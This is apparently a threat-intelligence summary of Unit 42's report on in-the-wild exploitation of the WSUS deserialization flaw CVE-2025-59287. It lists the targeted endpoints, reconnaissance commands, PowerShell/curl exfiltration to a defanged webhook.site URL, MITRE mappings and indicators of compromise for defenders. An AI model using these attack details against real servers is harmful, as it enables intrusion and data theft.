A critical unauthenticated RCE vulnerability in Windows Server Update Services (CVE-2025-59287) was actively exploited in the wild shortly after Microsoft released an emergency patch on Oct. 23, 2025, prompting CISA to add it to the KEV catalog. Unit 42 observed exploitation chains leveraging unsafe deserialization via GetCookie() and ReportingWebService endpoints, with attackers using exposed WSUS instances on ports 8530/8531 for initial access. #CVE-2025-59287 #WindowsServerUpdateServices
Keypoints
- Critical unauthenticated RCE in WSUS (CVE-2025-59287) with CVSS 9.8 — allows remote code execution as SYSTEM on servers with the WSUS role enabled.
- Microsoft’s October Patch Tuesday fix was incomplete; an out-of-band emergency update was released on Oct. 23, 2025.
- Active exploitation observed within hours of the emergency patch; CISA added the vulnerability to its KEV Catalog on Oct. 24.
- Vulnerability stems from unsafe deserialization of untrusted data via BinaryFormatter and SoapFormatter targeting GetCookie() and ReportingWebService endpoints.
- Attackers targeted internet-exposed WSUS instances on TCP ports 8530 (HTTP) and 8531 (HTTPS), with Cortex Xpanse identifying ~5,500 exposed instances.
- Observed post-exploit activity includes PowerShell execution via wsusservice.exe or w3wp.exe parent processes, internal reconnaissance (whoami, net user /domain, ipconfig /all), and exfiltration to a Webhook.site endpoint.
- Interim mitigations include disabling the WSUS Server Role or blocking inbound TCP 8530/8531 until patches can be applied; Unit 42 provides hunting queries and incident response support.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Attackers exploited a remote, unauthenticated RCE in WSUS (CVE-2025-59287) by sending specially crafted requests to GetCookie() and ReportingWebService endpoints causing unsafe deserialization (“…sending a specially crafted request to the GetCookie() endpoint… causes the server to improperly deserialize an AuthorizationCookie object…” ).
- [T1218] Signed Script Proxy Execution – Malicious PowerShell commands executed via legitimate parent processes (wsusservice.exe/w3wp.exe → cmd.exe → cmd.exe → powershell.exe) to run post-exploitation scripts (“…wsusservice.exe → cmd.exe → cmd.exe → powershell.exe and w3wp.exe → cmd.exe → cmd.exe → powershell.exe”).
- [T1083] File and Directory Discovery / [T1082] System Information Discovery – Initial reconnaissance commands run to map the environment, such as whoami, net user /domain, and ipconfig /all (“…the initial payload executes commands to gather intelligence on the internal network environment, including whoami, net user /domain, and ipconfig /all”).
- [T1041] Exfiltration Over Web Service – Collected information was exfiltrated to an attacker-controlled Webhook.site endpoint using Invoke-WebRequest or curl.exe (“…exfiltrated to a remote, attacker-controlled Webhook.site endpoint using a PowerShell payload that attempts Invoke-WebRequest and falls back to curl.exe…”).
Indicators of Compromise
- [URL] Exfiltration endpoint – hxxp://webhook[.]site/22b6b8c8-2e07-4878-a681-b772e569aa6a
- [Ports] Publicly exposed WSUS service ports – TCP 8530 (HTTP), TCP 8531 (HTTPS)
- [Processes / Commands] Malicious process chains and commands – wsusservice.exe → cmd.exe → powershell.exe; w3wp.exe → cmd.exe → powershell.exe; observed commands: whoami, net user /domain, ipconfig /all
- [Asset Count] Internet-exposed instances – ~5,500 WSUS instances identified by Cortex Xpanse
Read more: https://unit42.paloaltonetworks.com/microsoft-cve-2025-59287/